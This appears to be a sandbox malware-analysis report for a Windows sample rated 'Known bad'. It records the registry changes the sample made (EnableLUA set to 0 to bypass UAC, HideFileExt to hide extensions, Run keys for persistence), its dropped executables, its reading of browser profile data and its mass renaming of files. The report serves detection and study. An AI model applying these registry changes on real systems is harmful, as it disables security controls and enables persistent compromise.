Analysis Overview
SHA256
95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290c
Threat Level: Known bad
The file 95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies visibility of file extensions in Explorer
Renames multiple (60) files with added filename extension
Renames multiple (72) files with added filename extension
Executes dropped EXE
Loads dropped DLL
Deletes itself
Checks computer location settings
Reads user/profile data of web browsers
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Program crash
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-20 22:31
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-20 22:31
Reported
2024-10-20 22:33
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
109s
Command Line
Signatures
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Renames multiple (72) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
| N/A | N/A | C:\ProgramData\fGoIwkok\pWEYIMQs.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eQAkQcoo.exe = "C:\\Users\\Admin\\YGoswEoY\\eQAkQcoo.exe" | N/A | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Veokogws.exe = "C:\\ProgramData\\qIgcssEE\\Veokogws.exe" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xoEoMkQo.exe = "C:\\Users\\Admin\\ueMcoUsA\\xoEoMkQo.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pWEYIMQs.exe = "C:\\ProgramData\\fGoIwkok\\pWEYIMQs.exe" | C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xoEoMkQo.exe = "C:\\Users\\Admin\\ueMcoUsA\\xoEoMkQo.exe" | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\pWEYIMQs.exe = "C:\\ProgramData\\fGoIwkok\\pWEYIMQs.exe" | C:\ProgramData\fGoIwkok\pWEYIMQs.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\shell32.dll.exe | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\shell32.dll.exe | C:\Users\Admin\ueMcoUsA\xoEoMkQo.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
